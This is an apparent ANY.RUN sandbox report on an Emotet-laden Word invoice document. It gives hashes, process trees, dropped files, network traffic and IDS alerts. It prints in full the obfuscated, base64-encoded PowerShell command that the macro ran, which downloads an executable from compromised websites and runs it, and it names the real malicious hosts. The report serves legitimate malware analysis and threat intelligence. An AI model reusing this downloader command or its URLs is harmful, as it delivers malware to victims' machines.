analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

last_invoice-W8_91-00_S657.doc

Full analysis: https://app.any.run/tasks/d3057da0-5a84-4007-9948-4485bb52fd4b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 21, 2019, 18:11:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 21 15:17:00 2019, Last Saved Time/Date: Thu Mar 21 15:17:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0
MD5:

C17B4E0E2864D1A6B09761FED6C7B956

SHA1:

CA003D4199A76C06AD313512B9039AB3D1CD0A9B

SHA256:

523F96C17C4EF8441207551E9D4A6E72424653291FE39E7D59E26C8797B194EA

SSDEEP:

3072:u77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q+AGphPJ54haq:u77HUUUUUUUUUUUUUUUUUUUT52VLAGH4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 583.exe (PID: 2880)
      • 583.exe (PID: 3752)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3952)
  • SUSPICIOUS

    • Application launched itself

      • 583.exe (PID: 2880)
    • Creates files in the user directory

      • powershell.exe (PID: 3952)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3952)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 128)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 128)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:03:21 15:17:00
ModifyDate: 2019:03:21 15:17:00
Pages: 1
Words: 1
Characters: 6
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 6
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe 583.exe no specs 583.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
128"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\last_invoice-W8_91-00_S657.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3952powershell -e JABLAHcAdwBBAEEAMQA0AEcAPQAoACcASQBCACcAKwAnAEIAVQBBAEEAMQAxACcAKQA7ACQAWABvAFUAUQBBAFEAYwA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAQQBYAFUAWABCAEEAPQAoACcAaAB0AHQAcAA6ACcAKwAnAC8ALwBhAHYAbwBjACcAKwAnAGEAdABzAC0AZQB0ACcAKwAnAHIAYQBuAGcAZQByAHMALgBjAG8AJwArACcAbQAvAHcAcAAtACcAKwAnAGEAJwArACcAZAAnACsAJwBtAGkAbgAnACsAJwAvADAAcwBtAC8AQABoAHQAdAAnACsAJwBwADoALwAvAGEAcgB0AGUAJwArACcAYwBhAHUAdAAnACsAJwBvAG0AYQB0ACcAKwAnAGUAbgAnACsAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwAC0AYwBvAG4AdAAnACsAJwBlACcAKwAnAG4AdAAvACcAKwAnADIAJwArACcANwA1AFcAdwBhAC8AQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHQAaQB0ACcAKwAnAGEAbgAnACsAJwBpAHUAbQB0AHYALgBjAGwAdQBiAC8AdwBwAC0AYwBvAG4AdABlACcAKwAnAG4AdAAvAEEAMwAxAGsAOQBPACcAKwAnAC8AQABoAHQAdABwADoAJwArACcALwAvAGUAeQAnACsAJwBuAG8AJwArACcAcgBkAGkAYwAuAGMAbwAnACsAJwBtAC8AYwAnACsAJwBnAGkALQBiACcAKwAnAGkAbgAvAEwAJwArACcAagAvAEAAaAB0ACcAKwAnAHQAcAA6ACcAKwAnAC8AJwArACcALwB0AGUAcwAnACsAJwB0AC4AbwAnACsAJwByAGQAJwArACcALgAnACsAJwBuAHUAJwArACcAdQBjAGwAJwArACcAbwB1AGQALgBjAG8AbQAvAGEAdwBzAHQAYQB0AHMAJwArACcALQBpAGMAbwAnACsAJwBuAC8AcwAnACsAJwBYACcAKwAnAEEAJwArACcAUAB5AC8AJwApAC4AKAAnAFMAJwArACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAEsAQQA0AHgAQQBDAFUAPQAoACcAWQA0AF8AJwArACcAdwBCAEEAJwApADsAJAB3AEEAQQBVAEEAMQB4ACAAPQAgACgAJwA1ACcAKwAnADgAMwAnACkAOwAkAG4AUQB3AEEANABjAD0AKAAnAFUAQQBEACcAKwAnAEEAJwArACcAQQBjAEEAYwAnACkAOwAkAEkAWgBHAEIAQgBBAEEAQQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwBBAEEAVQBBADEAeAArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGEAWABvAFoANABBACAAaQBuACAAJABBAFgAVQBYAEIAQQApAHsAdAByAHkAewAkAFgAbwBVAFEAQQBRAGMALgAoACcARABvACcAKwAnAHcAbgBsAG8AYQBkAEYAaQBsACcAKwAnAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAGEAWABvAFoANABBACwAIAAkAEkAWgBHAEIAQgBBAEEAQQApADsAJABmAHcARABjADQAWAA9ACgAJwBNAFUAJwArACcANABjADQAQQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQASQBaAEcAQgBCAEEAQQBBACkALgAiAGwAZQBgAE4ARwBgAFQASAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBaAEcAQgBCAEEAQQBBADsAJABiAHcAQQBBAEEAQQA9ACgAJwBjAFEAQQBEAHgAJwArACcANABYACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABoAGMAVQBrAFEAQwA9ACgAJwBjACcAKwAnAEEAMQBrAFUAQQBBACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2880"C:\Users\admin\583.exe" C:\Users\admin\583.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
3752--5568bf2eC:\Users\admin\583.exe583.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Version:
8,6,0,1000
Total events
1 687
Read events
1 214
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
128WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9BC9.tmp.cvr
MD5:
SHA256:
3952powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LQVU5QSELIC4LHC8D7MA.temp
MD5:
SHA256:
128WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\last_invoice-W8_91-00_S657.doc.LNKlnk
MD5:3EF0B8B9997636EA2C0AFE551130FA29
SHA256:4D7FA607BBD1CE3E9B31916990133ED07D47023F3D19D6F2377A01F5D55F745C
3952powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
3952powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfaabe.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
128WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:D86B866109EF66C15CBD1221CF4B1DA3
SHA256:725D7CB1D5A78F2697D90D050EC7C3B862BE03151934108CCCBA65ED2EF87232
128WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:305C400ED442446D10C0DF9143ECB369
SHA256:14E999068266FF6CC35D87A9744878D721C485E5DBDD2A23F3384397D7F6E6B4
128WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:3B04E7993519882141D948FAD905C66D
SHA256:1F8E2E46BC3D344E3B4B7877FB6CC845F6EA8F7EE90E2B02A01D6AE8022841C3
128WINWORD.EXEC:\Users\admin\Downloads\~$st_invoice-W8_91-00_S657.docpgc
MD5:BA537CE133B2BDAFB51B02147F6CBE3B
SHA256:E4295D95C1986C06B1F8D1E22C9ABFAACEE0552A2EE3A818D654C0FD9B1C73B8
3952powershell.exeC:\Users\admin\583.exeexecutable
MD5:4189987AF6370A45364D46C23F663FF0
SHA256:3CFC9F02EC2B1ABC63D826CE37CE964E7361D3E1E9E855D16A7B534E41CCAB7B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3952
powershell.exe
GET
200
163.172.199.28:80
http://avocats-etrangers.com/wp-admin/0sm/
FR
executable
171 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3952
powershell.exe
163.172.199.28:80
avocats-etrangers.com
Online S.a.s.
FR
suspicious

DNS requests

Domain
IP
Reputation
avocats-etrangers.com
  • 163.172.199.28
suspicious

Threats

PID
Process
Class
Message
3952
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3952
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3952
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info